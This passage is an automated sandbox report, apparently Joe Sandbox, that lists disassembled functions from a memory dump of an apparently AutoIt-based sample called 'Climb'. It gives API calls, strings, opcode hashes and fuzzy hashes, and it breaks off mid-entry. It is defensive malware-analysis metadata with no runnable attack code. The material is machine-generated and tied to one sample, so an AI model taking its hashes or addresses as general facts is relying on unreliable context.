Instruction Fuzzy Hash: B5619B70204202AFD321DF15D498F29BBE5BF94308F54C49DF86A8B6A2C775EC49DB92

Function 00584322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 005843C1
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 005843D6
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 005843F0
_wcslen.LIBCMT ref: 00584435
SendMessageW.USER32(?,00001057,00000000,?), ref: 00584462
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00584490

Strings

SysListView32, xrefs: 00584393

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 516d5272b9b1adbcb2afd97e04a9c429c3a34c44c8c69df853e7dbb8983a5f06
Instruction ID: 2827195f67ceeca165406e19cc153a3d7b2cc4ee6048a027418f0094e1e21a09
Opcode Fuzzy Hash: 516d5272b9b1adbcb2afd97e04a9c429c3a34c44c8c69df853e7dbb8983a5f06
Instruction Fuzzy Hash: 2441AE7190030AABEF21AF64CC49BEA7BA9FB48360F10052AFD54F7291D7759984DF90

Function 0055C625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0055C6C4
IsMenu.USER32(00000000), ref: 0055C6E4
CreatePopupMenu.USER32 ref: 0055C71A
GetMenuItemCount.USER32(018BFB88), ref: 0055C76B
InsertMenuItemW.USER32(018BFB88,?,00000001,00000030), ref: 0055C793

Strings

2, xrefs: 0055C6FE
0, xrefs: 0055C66F

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 088505ebaff8a86f7186799f770a7487842b11dd190bf66943bfeab8a6ecab79
Instruction ID: 7e7d0aba2bd7db45cdcfed67bd36e51c20638257afdf2f9e03a8682d61b8fdd4
Opcode Fuzzy Hash: 088505ebaff8a86f7186799f770a7487842b11dd190bf66943bfeab8a6ecab79
Instruction Fuzzy Hash: 1C518A706103059FDB10CF68D8A8AAEBFF4FB58319F24455BEC11A6691E3709948CFA1

Function 004F19CD Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 004F19E1
ScreenToClient.USER32(00000000,?), ref: 004F19FE
GetAsyncKeyState.USER32(00000001), ref: 004F1A23
GetAsyncKeyState.USER32(00000002), ref: 004F1A3D

Strings

$'O, xrefs: 00533164, 0053318D, 005331C3
$'O, xrefs: 004F19F0, 004F1A07, 00533135

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID: $'O$$'O
API String ID: 4210589936-1244004566
Opcode ID: 48af3336e66eec060e17a13d6e50f6b77f2066f8bd612302e88320827056a3cc
Instruction ID: 9be7695eb24140d42d7ffb61fd9acd7905f4a27fa23033d45d666e2a5003bec7
Opcode Fuzzy Hash: 48af3336e66eec060e17a13d6e50f6b77f2066f8bd612302e88320827056a3cc
Instruction Fuzzy Hash: EB415071A0420AFFDF15AF64C844BFEBB74FB05324F20821AE969A22A0D7346A54DB51

Function 005886FC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00588740
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00588765
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0058877D
GetSystemMetrics.USER32(00000004), ref: 005887A6
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0056C1F2,00000000), ref: 005887C6

Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0

GetSystemMetrics.USER32(00000004), ref: 005887B1

Strings

(\, xrefs: 00588709

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID: (\
API String ID: 2294984445-3685820393
Opcode ID: d1752466c17b1c50c24dcc20a498340e35fe66a3795dbd9d35222e815c836d61
Instruction ID: 3a905d32be82f13c7d99b042469338b08098fa4fddadb344abfcd18e737c2aa6
Opcode Fuzzy Hash: d1752466c17b1c50c24dcc20a498340e35fe66a3795dbd9d35222e815c836d61
Instruction Fuzzy Hash: 0321A1716102459FCB14AF39CC08B7A3BB6FB44365F644A29FD26E21E0EF319854DB20

Function 0055D11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0055D1BE

Strings

stop, xrefs: 0055D18F
warning, xrefs: 0055D1A7
info, xrefs: 0055D15F
blank, xrefs: 0055D140
question, xrefs: 0055D177

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 2efd3d4dc532b6585e243a9450557dd7e54a79fc0afcd6d985fc15fbb3b849f6
Instruction ID: 3a5389b8cedd49d55c884353147de73f60d70de21454b916b830924fb81abc16
Opcode Fuzzy Hash: 2efd3d4dc532b6585e243a9450557dd7e54a79fc0afcd6d985fc15fbb3b849f6
Instruction Fuzzy Hash: 2811DB3324870ABAF7155A14EC92DAE6FBCFF59761B200017FD01A52C1D7B46A448670

Function 0055E73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 0055E759
gethostname.WSOCK32(?,00000100), ref: 0055E773
gethostbyname.WSOCK32(?), ref: 0055E780
inet_ntoa.WSOCK32(?), ref: 0055E7C2
_strcat.LIBCMT ref: 0055E7D0
WSACleanup.WSOCK32 ref: 0055E7F5

Strings

0.0.0.0, xrefs: 0055E79E

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: 6a449db3a2aa297e685fe07321838434d17505ab8cbe8f3a8deead88b6d9f976
Instruction ID: f26b9d0f8af29cf6c4e708c933d7ededa3de000181848cf998e84c9df0193935
Opcode Fuzzy Hash: 6a449db3a2aa297e685fe07321838434d17505ab8cbe8f3a8deead88b6d9f976
Instruction Fuzzy Hash: D511E471900115BBDB246720DC4BEEA7FBCFF45711F0000A6F915E6091EE749B8ADB60

Function 0055F630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0055F641
_wcslen.LIBCMT ref: 0055F652
_wcslen.LIBCMT ref: 0055F690
_wcslen.LIBCMT ref: 0055F6C6
_wcslen.LIBCMT ref: 0055F6F6
_wcslen.LIBCMT ref: 0055F706
_wcslen.LIBCMT ref: 0055F742
_wcslen.LIBCMT ref: 0055F771

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: a3f4e9ff33060f7cc4097bd567117a0acbfc952133637cdfbe5ba8e889412995
Instruction ID: bd3bb9ccbceeb80cf00dfc94a3309ed38af316e4348b336fb48b628bdee6f6d4
Opcode Fuzzy Hash: a3f4e9ff33060f7cc4097bd567117a0acbfc952133637cdfbe5ba8e889412995
Instruction Fuzzy Hash: 7A41B065C10205B5EB11EBB88C8AACFBBB8FF45350F008422E509E3121FB34E695C7E6

Function 0058379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 005837B7
GetDC.USER32(00000000), ref: 005837BF
GetDeviceCaps.GDI32(00000000,0000005A), ref: 005837CA
ReleaseDC.USER32(00000000,00000000), ref: 005837D6
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00583812
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00583823
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00586504,?,?,000000FF,00000000,?,000000FF,?), ref: 0058385E
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 0058387D

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 5440a8f8a17f0c281adfb4ae8b8c829dcb4b75a5992d443f22663f0e9374f963
Instruction ID: 1eebb7d7cd71df07d20c13e128cf3af326cffb0ef575b223690aa96f97954c42
Opcode Fuzzy Hash: 5440a8f8a17f0c281adfb4ae8b8c829dcb4b75a5992d443f22663f0e9374f963
Instruction Fuzzy Hash: 21317C72201214ABEB159F509C8AFEB3FA9FF59721F044065FE08EA191D6B59941CBB0

Function 00575A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00575A8B, 00575DE0
Not an Object type, xrefs: 00575A64

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 90d9ab64b42cb2ab5eb97c239711104636b073fb916d6ee1e42f019f69202baa
Instruction ID: f167bc1b62e543eae091c9ab864af9907757878945da597450542d24b2213c5e
Opcode Fuzzy Hash: 90d9ab64b42cb2ab5eb97c239711104636b073fb916d6ee1e42f019f69202baa
Instruction Fuzzy Hash: 52D1AF71A0060A9FDF10CF68D885BAEBBB5FF48304F14C469E919AB281E7B0ED45DB50

Function 005318A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00531B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0053194E
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00531B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 005319D1
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00531B7B,?,00531B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00531A64
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00531B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00531A7B

Part of subcall function 00523B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00516A79,?,0000015D,?,?,?,?,005185B0,000000FF,00000000,?,?), ref: 00523BC5

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00531B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00531AF7
__freea.LIBCMT ref: 00531B22
__freea.LIBCMT ref: 00531B2E

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 3266c5f82cea89a5e332248f42f4dffd06008ee8ff211f7f81d83ed603fd27db
Instruction ID: f0468532418f2af3499779205c1d341f945c1ae3880cd5d3daeaace18a5799ee
Opcode Fuzzy Hash: 3266c5f82cea89a5e332248f42f4dffd06008ee8ff211f7f81d83ed603fd27db
Instruction Fuzzy Hash: E091D672E00A169ADF208EB4CCA5BEEBFB5BF49710F180569E805E7181EB34DC45C768

Function 00574F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 005750A5
VariantInit.OLEAUT32(?), ref: 005751A6
VariantClear.OLEAUT32(?), ref: 005751B0
VariantClear.OLEAUT32(?), ref: 0057520D

Strings

Null Object assignment in FOR..IN loop, xrefs: 00575035, 00575163, 0057521B
Incorrect Object type in FOR..IN loop, xrefs: 00575189

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: cd871168ae0aeedeb137ab6b61ac3799ef1d2e9ad75cbf5bb0a722f80cb53d2a
Instruction ID: 38b2d010c23ab30854bd5fc86bc7c31f23ed022eef7bad56040d4a37bdeee0a3
Opcode Fuzzy Hash: cd871168ae0aeedeb137ab6b61ac3799ef1d2e9ad75cbf5bb0a722f80cb53d2a
Instruction Fuzzy Hash: E0919E70A00619ABDF20CFA5DC48FAEBFB8FF45714F108519F509AB280E7B09945DBA0

Function 00561B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00561C1B
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00561C43
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00561C67
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00561C97
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00561D1E
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00561D83
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00561DEF

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 36c4e7a587188b86770ee20301fb29b078cb317e2137076c4c00d6923552e30b
Instruction ID: 844a87d6daab25cc865d458c219eea62e1cc23b7eee962d4b32334f3548dbc0f
Opcode Fuzzy Hash: 36c4e7a587188b86770ee20301fb29b078cb317e2137076c4c00d6923552e30b
Instruction Fuzzy Hash: DD91E275A00A19AFEB00DF94C889BFEBBB4FF44715F184419E901EB2A1D774AD44CB98

Function 005743A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 005743C8
CharUpperBuffW.USER32(?,?), ref: 005744D7
_wcslen.LIBCMT ref: 005744E7
VariantClear.OLEAUT32(?), ref: 0057467C

Part of subcall function 0056169E: VariantInit.OLEAUT32(00000000), ref: 005616DE
Part of subcall function 0056169E: VariantCopy.OLEAUT32(?,?), ref: 005616E7
Part of subcall function 0056169E: VariantClear.OLEAUT32(?), ref: 005616F3

Strings

AUTOIT.ERROR, xrefs: 005744DD, 005744E2
Incorrect Parameter format, xrefs: 00574403, 005745FE

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: cdbeaace7d871e62aecd8adfa6dd62c293d9aa10f1bc03eaa549b3ba2e9a7692
Instruction ID: 35bcda13971537a4c46b19a48494b75d321c357dbad2c48ae4afbdabf953da02
Opcode Fuzzy Hash: cdbeaace7d871e62aecd8adfa6dd62c293d9aa10f1bc03eaa549b3ba2e9a7692
Instruction Fuzzy Hash: 649134746083069FCB00EF24D48496ABBE5BF89714F14892EF8899B351DB31ED05DF92

Function 0057560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 005508FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00550831,80070057,?,?,?,00550C4E), ref: 0055091B
Part of subcall function 005508FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00550831,80070057,?,?), ref: 00550936
Part of subcall function 005508FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00550831,80070057,?,?), ref: 00550944
Part of subcall function 005508FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00550831,80070057,?), ref: 00550954

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 005756AE
_wcslen.LIBCMT ref: 005757B6
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0057582C
CoTaskMemFree.OLE32(?), ref: 00575837

Strings

NULL Pointer assignment, xrefs: 00575880, 005758AF

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: f82ceabc6b0e2f077422d9d07a265c231ebb43b8f9b45aa6faafaef3105ad52f
Instruction ID: 9699ca8f46b42262974a744c4f4b61df4242bfc6f7a6782d7ab05fa63cff4416
Opcode Fuzzy Hash: f82ceabc6b0e2f077422d9d07a265c231ebb43b8f9b45aa6faafaef3105ad52f
Instruction Fuzzy Hash: 2A910771D0021DAFDF14DFA4D881AEDBBB8FF08304F10856AE919A7291EB745A44DFA1

Function 00582B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00582C1F
GetMenuItemCount.USER32(00000000), ref: 00582C51
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00582C79
_wcslen.LIBCMT ref: 00582CAF
GetMenuItemID.USER32(?,?), ref: 00582CE9
GetSubMenu.USER32(?,?), ref: 00582CF7

Part of subcall function 00554393: GetWindowThreadProcessId.USER32(?,00000000), ref: 005543AD
Part of subcall function 00554393: GetCurrentThreadId.KERNEL32 ref: 005543B4
Part of subcall function 00554393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00552F00), ref: 005543BB

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00582D7F

Part of subcall function 0055F292: Sleep.KERNEL32 ref: 0055F30A

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 1dc8cbbe534ae9522705293728d59bf9538c8cc3207de50ad5e87cf32f98af5d
Instruction ID: c9c38a4d559603e53542d989a7d81f35d05d91e2ca1b00e38b5f160bcd430ae2
Opcode Fuzzy Hash: 1dc8cbbe534ae9522705293728d59bf9538c8cc3207de50ad5e87cf32f98af5d
Instruction Fuzzy Hash: 9C715E75A00209AFCB10EF65C845AAEBFF5FF88314F148859E916FB251DB74AD42CB90

Function 0055B881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0055B8C0
GetKeyboardState.USER32(?), ref: 0055B8D5
SetKeyboardState.USER32(?), ref: 0055B936
PostMessageW.USER32(?,00000101,00000010,?), ref: 0055B964
PostMessageW.USER32(?,00000101,00000011,?), ref: 0055B983
PostMessageW.USER32(?,00000101,00000012,?), ref: 0055B9C4
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0055B9E7

Memory Dump Source

